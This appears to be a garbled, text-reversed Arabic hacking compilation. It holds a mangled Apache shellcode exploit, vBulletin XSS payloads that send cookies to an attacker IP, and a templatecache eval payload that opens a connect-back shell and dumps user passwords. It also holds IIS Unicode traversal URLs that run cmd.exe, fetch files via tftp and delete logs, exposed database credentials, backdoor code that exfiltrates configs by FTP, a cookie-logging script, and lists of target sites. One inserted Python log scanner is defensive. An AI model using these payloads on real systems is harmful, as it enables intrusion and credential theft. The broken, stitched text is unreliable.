to execute when our shellcode
;("\\\replies\\\\n
printf(\\\" \\\\t\\\\t\\\\taka
;("\\\auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be
published in upcoming apache;("\\\scalp-HOWTO.pdf\\\\n
printf(\\\"\\\\n--- --- - Potential targets
;("\\\list - --- ---- ------- ------------\\\\n
printf(\\\" ID / Return addr / Target
;("\\\specification\\\\n
for(i = 0; i <
(++sizeof(targets)/sizeof(victim); i
printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\",
;(i, targets[i].retaddr, targets[i].type
;(exit(1
{
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
while((i = getopt(argc,
(argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
}
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
if((portp = strtok(NULL, \\\":\\\")) ==
(NULL
;"\\\portp = \\\"80
;break
/* predefined targets */
:'\\case \\'t
if(atoi(optarg) >=
} ((sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
;return -1
{
memcpy(&victim,
&targets[atoi(optarg)],
;((sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
victim.retaddr = strtoul(optarg,
;(NULL, 16
printf(\\\"Using 0x%lx as the
baseadress while
bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
printf(\\\"Using %d as delta\\\\n\\\",
;(victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return
address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
printf(\\\"Number of zeroes will be
;(%d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD
;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
:default
printf(\\\"[-] Better luck next
;("\\\time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d
seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
{
{
if(!victim.delta || !victim.retaddr || !
(victim.repretaddr || !victim.repzero
}
printf(\\\"[-] Incomplete target. At
least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
printf(\\\"[*] Resolving target
;("\\\ ..host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
else if((ia.s_addr = inet_addr(hostp))
} (== INADDR_ANY
printf(\\\"There\\'z no %s on this side
;(of the Net!\\\\n\\\", hostp
;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress =
0;;victim.retaddr +=
} (RET_ADDR_INC
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4)
((|| memchr(&victim.retaddr, 0x0d, 4
;continue
sock = socket(PF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr *)) +
4) + victim.repzero
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET /
HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
;(PUT_STRING(buf
} (if(!shown_length
printf(\\\"[*] Exploit output is %u
bytes\\\\n\\\", (unsigned int)(p ;((expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
printf(\\\"\\\\r[*] Currently using
;(retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
;('\\;'\\)putchar
{
else
'\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\",
victim.type, victim.delta,
victim.retaddr, victim.repretaddr,
;(victim.repzero
printf(\\\"Experts say this isn\\'t
exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
)) angels-
bytes.com ((
http://www.angels-bytes.com/?show=tools&action=info&id=19
" "
><
php
) ( vb
/
-1 .
. .
-2
index.php admin
/
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
Password
-3 3000
!!
.
-4 HTML
..
.
-5 . .
.
"
" vBulletin2,2,0
><
-------- :
-------- : vBulletin
) WebServer :
( + )( .
:
: vBulletin !!
.
--------- :
-------- . ..
..
.. HTML
)
.. ( HTML
:
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
IP Adress IP
.
.
.
.. .
)
IIS Apache
( .
Log
..
.. Apche
logs . Acces Log
..
.. :
GET / bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvisit=1011983161
..
..
..
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
" : )
" (....
) ( ..
.. )(
.. Forgot
.. Password
..
!!
! ..
-----------
---------- HTML
) + + +
( ... +
) HTML
(
.. IMG
> <script >
<img > <Demon
... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .
"
"
> <
> : <
7
1
2
3 SQL
4
5
6 %80
7
%100
.
****************
1
Powered by:
vBulletin
1
2
3
%60
http://www.vbulletin.org/index.php?topic=<script>alert(document.cookie)</script>
2
|?http://www.vbulletin.org/index.php
=forum/view.php&topic=../../../../../../..
/etc/passwd
********************
113
) ( Jouko
Pynnonen
vBulletin (http://www.vbulletin.com/) is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board.
DETAILS
=======
vBulletin templates are implemented in the following way: the gettemplate() function in global.php
if ($action=="faq") {
    eval("echo dovars(\"".gettemplate("faq")."\");");
}

function gettemplate($templatename, $escape=1) {
    // gets a template from the db or from the local cache
    global $templatecache,$DB_site;
    if ($templatecache[$templatename]!="") {
        $template=$templatecache[$templatename];
    } else {
        $gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='".addslashes($templatename)."'");
        $template=$gettemp[template];
        $templatecache[$templatename]=$template;
    }
    if ($escape==1) {
        $template=str_replace("\"","\\\"",$template);
    }
    return $template;
}
http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world
With this URL, you won't get the FAQ page, but just a blank page with the words "hello world".
The eval() call above will execute
echo dovars("hello world");
As if this wouldn't be bad enough, a remote user may as well pass a value containing quotation marks and other symbols. Quotation marks aren't always escaped as seen in the code above, in which case index.php could end up executing code like
echo dovars("hello"world");
This would produce a PHP error message due to unbalanced quotes. It doesn't take a rocket scientist to figure out how a remote user could execute arbitrary code from here, so further details about exploitation aren't necessary. If your vBulletin board produces an error message with an URL like the one above prefixed with a single quotation mark, it's definitely vulnerable.
The above example works with the "Lite" version. The commercial versions are vulnerable too, but details may differ. After a little experimenting on the Jelsoft's test site I found
. .
url
hello+world
:
-1
vb 113 or 115
) 90 -2
(
url -3
search.php3?
action=simplesearch&query=search
this&templatecache[standardredire
ct]="%29%3B%24fa="<
%261";set_time_limit(substr("900",0
,3));
%24fp=fsockopen(substr("IP.IP.IP.I
P",0,12),substr("90",0,2),
%26%24errno,
%26%24errstr,substr("900" ,0,3));if(!
%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads
%20database,or%20press%20return
%20for
%20command%20line" ,0,63));
%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
strlen(%24va)>1))
{include(substr("admin/config.php",
0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr(
"%24servername",0,strlen(%24serv
ername)),substr("%24dbusername",
0,strlen(%24dbusername)),substr("
%24dbpassword" ,
0,strlen(%24dbpassword)));
%24currenta=mysql_db_qu
ery(substr("%24dbname",0,strlen(%
24dbname)),substr("select%20*
%20from%20user" ,
0,18));while(%24res=mysql_fetch_ar
ray%20(%24curre
nta))
{fputs(%24fp,"%24res[userid],");fpu
ts(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fp
uts(%24fp,"%24res
%24arr);
%24str=exec(fgets(%24fp,substr("1
28",0,3)),
%24arr);for(%24ir=substr("0",0,1);
%24ir< sizeof(%24arr);%24ir%2B
%2B){fputs(%24fp,%24arr[%24
ir]);fputs(%24fp,
_%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
By Kill -9
IP.IP.IP.IP
12
127.0.0.1
9
) arabteam2000.com (
c4arab.com
. ...
!!
:
90
d downloads
2.2x
113 11
115 225
*******************
3 SQL
.
: ) ( SQL
ASP
SQL ASP
SQL
SQL
1433
SQL
SQL
.
:
SQL
PHP ASP
_LinuxRay
-. - -
. Administrator
...
867
:
SQL
User Name Passwd
: .
User name
and Passwd ASP
* sql.
htr.+
. :
http://target/page.asp+.htr
: target
: Page asp
: htr.+
.
....
View
Source ASP
:
<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
---------------------------------------------------------------- . _
LinuxRay
6666666
-----------------------------------------------------------------
ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.
.
.
ASP
database.inc
<!--#include file = "database.inc"-->
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.
...
.
!! SQL
.
Visual interdev 6.0
. ACCESS 2000
File
New
(Project (Exiting Data
.
Create
Data Link Properties
-
. -
- 1 Select or
enter server name
- 2 . User Name
- 3 Password
) Blank
(Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
:
/http://www.moe.gov.sa
-1 :
http://www.moe.gov.sa/news_admin.asp
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/news_admin.asp, line 7
: htr
http://www.moe.gov.sa/news_admin.asp+.htr
<!--#include file = "database.inc"-->
: database.inc
http://www.moe.gov.sa/database.inc
:
%>
Set DB=
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PW
D=;APP=Microsoft (R) Developer
Studio;WSID=CNW2;DATABASE=m
"oe_dbs", "sa", "123321
<%
. .
.....
.
:
/http://www.itsalat.com
User name : sa Passwd : sp2000 - 1
*****************
. %80
2
1.5 15000
1
2
3
4
6. . %100
IIS
IIS
...IIS5.0
4 5
.
.
.
:
http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c:\
c:
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
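The encoded traversal variants listed above and the PHP-Nuke admin.php copy()/upload request quoted in the twlc advisory earlier both leave a distinctive trace in the web server's access log. The following Python program is an added example, not code from this book or from either project: it percent-decodes each request path the way the vulnerable IIS decoder did (accepting overlong UTF-8 forms such as %c0%af for '/' and %c1%9c for '\'), normalises the path, and flags traversal to cmd.exe as well as GET requests that drive the PHP-Nuke FileManager upload branch. The log lines, client addresses and timestamps are constructed for the example, and the finding names are the example's own.

```python
"""Flag two of the request patterns discussed on this page in access logs.

Added example (not the book's own code). Decodes each request path the
way the vulnerable IIS decoder did, i.e. accepting overlong UTF-8 forms
such as %c0%af for '/', and flags (1) directory traversal to cmd.exe and
(2) GET requests that drive PHP-Nuke's admin.php FileManager upload
branch. Sample log lines, addresses and timestamps are constructed.
"""
import re
from urllib.parse import parse_qs, unquote_to_bytes, urlsplit

# Constructed sample in Common Log Format; hosts and addresses are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Oct/2001:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.7 - - [17/Oct/2001:10:00:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 1024
10.0.0.7 - - [17/Oct/2001:10:00:03 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 404 0
10.0.0.7 - - [17/Oct/2001:10:00:04 +0000] "GET /msadc/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 900
10.0.0.9 - - [17/Oct/2001:10:00:05 +0000] "GET /admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt HTTP/1.0" 302 0
10.0.0.9 - - [17/Oct/2001:10:00:06 +0000] "GET /admin.php?op=FileManager HTTP/1.0" 200 2048
10.0.0.3 - - [17/Oct/2001:10:00:07 +0000] "GET /images/logo.gif HTTP/1.0" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_overlong_utf8(raw: bytes):
    """Percent-decoded bytes -> (text, used_overlong).

    A conforming UTF-8 decoder rejects overlong forms such as C0 AF; the
    IIS decoder on this page did not, which is the whole trick. We decode
    the way the buggy server did so the path can be normalised and matched.
    Malformed bytes become U+FFFD and decoding continues.
    """
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b <= 0xDF:   length, cp = 2, b & 0x1F
        elif 0xE0 <= b <= 0xEF: length, cp = 3, b & 0x0F
        elif 0xF0 <= b <= 0xF7: length, cp = 4, b & 0x07
        elif 0xF8 <= b <= 0xFB: length, cp = 5, b & 0x03   # obsolete 5-byte form
        elif 0xFC <= b <= 0xFD: length, cp = 6, b & 0x01   # obsolete 6-byte form
        else:                   length, cp = 0, 0
        tail = raw[i + 1:i + length]
        if length == 0 or len(tail) != length - 1 or any(not 0x80 <= c <= 0xBF for c in tail):
            out.append('\ufffd'); i += 1; continue
        for c in tail:
            cp = (cp << 6) | (c & 0x3F)
        if cp < 0x80:
            overlong = True        # an ASCII char smuggled in a multi-byte form
        out.append(chr(cp) if cp <= 0x10FFFF else '\ufffd')
        i += length
    return ''.join(out), overlong


def analyse_request(method: str, target: str):
    """Return (findings, normalised_path) for one request line."""
    findings = []
    parts = urlsplit(target)
    path, overlong = decode_overlong_utf8(unquote_to_bytes(parts.path))
    # IIS treats '\' like '/', so normalise before looking for '..' segments.
    norm = path.replace('\\', '/').lower()
    traversal = '..' in norm.split('/')
    if traversal and norm.endswith('cmd.exe'):
        findings.append('iis-unicode-traversal' if overlong else 'traversal-to-cmd.exe')
    elif traversal:
        findings.append('traversal')
    # A real upload arrives as a multipart POST body; a GET whose query names
    # userfile/userfile_name is the copy() abuse from the PHP-Nuke advisory.
    if method == 'GET' and norm.endswith('/admin.php'):
        qs = parse_qs(parts.query)
        if 'upload' in qs and ('userfile' in qs or 'userfile_name' in qs):
            findings.append('phpnuke-filemanager-copy')
    return findings, norm


def scan_log(text: str):
    """Scan log text and return one alert dict per finding."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings, norm = analyse_request(m['method'], m['target'])
        for kind in findings:
            alerts.append({'line': lineno, 'client': m['client'], 'kind': kind,
                           'path': norm, 'status': int(m['status'])})
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The decoder deliberately accepts what a correct UTF-8 decoder would reject, because matching must see the path as the vulnerable server saw it; the status code is carried along because a 200 on a cmd.exe path is the line that needs immediate attention, while a 404 only shows a scan.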
:
http://www.xxxxx.com//////
+\/....2/cmd.exe/?/c
.
Dir
32
:
http://www.xxxxxx.com/scripts/.. ../
\:winnt/system32/cmd.exe?/c+dir+c
http://www.xxxxxx.com/scripts/.. ../
\winnt/system32/cmd.exe?/c+dir+c:
\Winnt\Sytem32
\Winnt\Sytem32
.....
http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c
32
\:c+dir+c
http://www.xxxxx.com/scripts/..
/...Winnt/System32
tftp.exe
..............................................................
...........................
www.geocities.com/anorR1234/tftpd
32.zip
\:C
tftp32.exe
\:C
---------------------------------------------------------------
=
:
http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
\:c+dir+c/
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
. .
tftp.exe
" "i-
1.1.1.1 .
GET
index.htm
\C:\inetpub\wwwroot
index.htm
\:C
index.htm
http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+212.212.212.212+GET+index.htm
+C:\inetpub\wwwroot\index.htm
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://server/msadc/..../..../c+del+c
:/*.log
--------------------------------------
*******************
1 .
1
$
2
30
3
%100
-
2.2.5
forum
PHP:
------------------------------------------------------------------------------
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy = y;
$vbxl = l;
echo "<!-- ";
$file = fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
------------------------------------------------------------------------------
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
. 2.2.6
option
PHP:
------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
echo " -->";
-------------------------------------------------------------------------------
functions
PHP:
------------------------------------------------------------------------------
$sqlupdate = base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm95YWwvLngyLmluYw==');
------------------------------------------------------------------------------
/http://saudi.no-ip.com
WELCOME TO
arab1.net
http://saudi.no-ip.com/~royal/.x2.inc
.......
PHP:
------------------------------------------------------------------------------
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
$file = fopen("$open", "r");
$rf = fread($file, 1000);
fclose($file);
?>
-->
</div>
************
6 %80
.
%80
1
2
3
4
5
6
Cfgwiz32.exe 7
C:\Windows
8 misc
9
******
1 htaccess.
2 htaccess.
3
4
5
6
7 . Cfgwiz32.exe
C:\Windows
8
9
10
.
Coded By : Sp.IC //
.((SpeedICNet@Hotmail.Com
Descrption: Fetching vBulletin's //
.cookies and storing it into a log file
:Variables //
;"LogFile = "Cookies.Log$
:Functions //
*/
If ($HTTP_GET_VARS['Action'] =
} (""Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else
;"" = Header$
;"" = Footer$
{
;(Print ($Header
/*
Print ("<Title>vBulletin XSS
Injection Vulnerability:
;("<Exploit</Title
;("<Print ("<Pre
;("<Print ("<Center
Print ("<B>vBulletin XSS Injection
;("Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail
.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
Switch
} (['($HTTP_GET_VARS['Action
:"Case "Log
Data =$
;['$HTTP_GET_VARS['Cookie
Data = StrStr ($Data, SubStr$
($Data, BCAdd (0x0D, StrLen
;(((((((DecHex (MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"0;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
:"Case "List
If (!File_Exists ($LogFile) || !
} ((In_Array ($Records
Print ("<Br><Br><B>There are No
;("<Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
{
Print ("o Download Log : " .
;("$Link['Download'] . "\n
Print ("o Clear Records : [<A
Href=\"" . $SCRIPT_PATH. "?
;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
While (List ($Line[0], $Line[1]) =
} ((Each ($Records
Print ("<B>" . $Line[0] . ": </B>" .
;([$Line[1
{
{
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot
;("<Delete Log</B></Center></Pre
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"3;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
{
<?
php -2
-3
member2.php?
s=[Session]&action=viewsubscripti
[on&perpage=[Script Code
[script code]
] //:Script>location='Http>
Action=Log&Cookie='+?[
<(document.cookie);</Script
-4
http://%20 / ?
Action=List
PhpBB2
admin_ug_auth.php
:
.
:
2.0.0
<html>
<head>
</head>
<body>
<form method="post" action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
/http://forums.xos.ca
...
- -
!!!!
!!! !!!
.....
) :
(
:
PHP Nuke versionh 6.0
. :
.
.
. :
. . .
/
.... images/forum/avatars
. ..
.
.
text ..
!!!!
:
.
Your Account
Your Info
view
source uid
. :
<input type="hidden" name="uid" value="2111">
... 2111
html
/http://nukesite
:......
<!-- START CODE -->
<form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form>
<!-- END CODE -->
html ..
:
"<
>b
...
submit Your
Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING
!!....
">b
..
30
....
xss
=(
:
!!!!
. ...
" "
:::
.1 .
http://members.lycos.co.uk/hiha
/ck/vb
.2 .
/http://www.e3sar.net/vb
.3 .
/http://www.ebnmasr.net/vb
.4 . .
/http://www.7azm.net/vb
.5 .
http://www.almuhands.org/forum
/index.php
.6 .
/http://www.arabse.net/vb
. .7
/http://www.emoataz.com/vb
. .8
/http://www.h4palestine.com
.9
/http://www.pharaonics.net
/http://www.ruwad.tk . .10
. .11
/http://www.nafitha.org
. .12
http://www.arab4vb.com/vb/inde
x.php
. .13
http://www.naajm.com/vb/forumd
isplay.php
...
.
"
"
) Kroll-O-Nagra
.)/http://www.securify.com
Security Focus
--------------- :
/http://www.securityfocus.com
.
!
BugTraq
------- : ) Security Focus
, /http://www.securityfocus.com
) )) Netspace
.(/http://www.netspace.org
BugTraq
mailing list
. Aleph1
.((aleph1@underground.org
) ( .
spams
.
/http://www.securityfocus.com
''search
Searching
-----------
Sendmail 8.8.3 'sendmail
'8.8.3 .
local DoS
sendmail
local DoS' :
'sendmail .
:::
/http://rootshell.redi.tk .1
http://www.ussrback.com .2
.3
http://www.insecure.org/sploits.h
tml
.4
http://www.linux.com.cn/hack.co.
za
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=
.
:::
http://www.haker.com.pl .1
.2
/http://www.webattack.com
.3 http://blacksun.box.sk
.4
http://www.blackcode.com
/http://www.TipsClub.com